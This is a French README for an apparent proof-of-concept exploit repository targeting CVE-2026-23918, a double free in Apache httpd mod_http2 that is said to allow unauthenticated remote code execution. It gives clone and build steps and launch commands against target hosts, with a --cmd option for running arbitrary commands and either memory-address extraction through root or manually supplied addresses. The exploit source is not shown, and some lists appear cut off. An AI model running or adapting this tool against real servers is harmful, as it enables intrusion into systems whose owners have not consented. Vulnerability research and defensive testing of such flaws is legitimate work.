
Exploit de preuve de concept basé sur Go pour CVE-2026-23918 ciblant une vulnérabilité de double libération dans Apache httpd mod_http2, permettant une exécution de code à distance sans authentification via des séquences d'arrosage mémoire et de déclenchement.
Ce dépôt contient une implémentation de preuve de concept écrite en Go pour un scénario de corruption mémoire avant authentification affectant Apache httpd avec mod_http2. Le code dans ce dépôt démontre une approche de pulvérisation et de déclenchement contre une cible vulnérable et est destiné à la recherche en sécurité autorisée, aux tests et à l'analyse défensive.
Le projet se concentre sur un exploit de preuve de concept pour CVE-2026-23918 et fournit une implémentation en un seul fichier dans exploit_poc.go. Le programme :
Ce dépôt n'est pas destiné à une utilisation non autorisée contre des systèmes tiers.
Avant de construire ou d'exécuter la PoC, assurez-vous que les éléments suivants sont disponibles :
Construisez le binaire avec la commande suivante :
git clone https://github.com/gagaltotal/CVE-2026-23918-Double-free-Apache-httpd-mod_http2
cd CVE-2026-23918-Double-free-Apache-httpd-mod_http2
go mod init CVE-2026-23918-Double-free-Apache-httpd-mod_http2
go mod tidy
go run exploit_poc.go
go build -o exploit exploit_poc.go
Cela génère un exécutable nommé exploit dans la racine du projet.


La PoC prend en charge deux modes opérationnels :
Ce mode nécessite un accès root et extrait automatiquement les adresses mémoire requises du processus worker Apache cible.
sudo ./exploit \
--pid 1234 \
--host 192.168.1.100 \
--port 443 \
--cmd "id > /tmp/pwned"
Ce mode nécessite que les adresses de la fonction system et de l'emplacement de requête du scoreboard soient fournies manuellement.
./exploit \
--host 192.168.1.100 \
--port 443 \
--system 0x7f1234567890 \
--scoreboard 0x7f1234000000 \
--cmd "id > /tmp/pwned"
Les principales options sont :
--host - Nom d'hôte ou adresse IP cible--port - Port cible (par défaut : 443)--workers - Nombre de threads de pulvérisation (par défaut : 32)--cmd - Commande à exécuter sur la cible--pid - ID du processus worker Apache pour l'extraction automatique d'adresse mémoire--system - Adresse du symbole system en mode manuel--scoreboard - Adresse de l'emplacement de requête du scoreboard en mode manuelsudo ./exploit --pid 1234 --host 10.0.0.20 --cmd "whoami"
./exploit \
--host 10.0.0.20 \
--system 0x7f1234567890 \
--scoreboard 0x7f1234000000 \
--cmd "uname -a"
Ce dépôt est fourni à des fins éducatives et d'évaluation de sécurité défensive. Toute utilisation en dehors d'un environnement contrôlé et autorisé est déconseillée et peut violer les lois ou politiques applicables.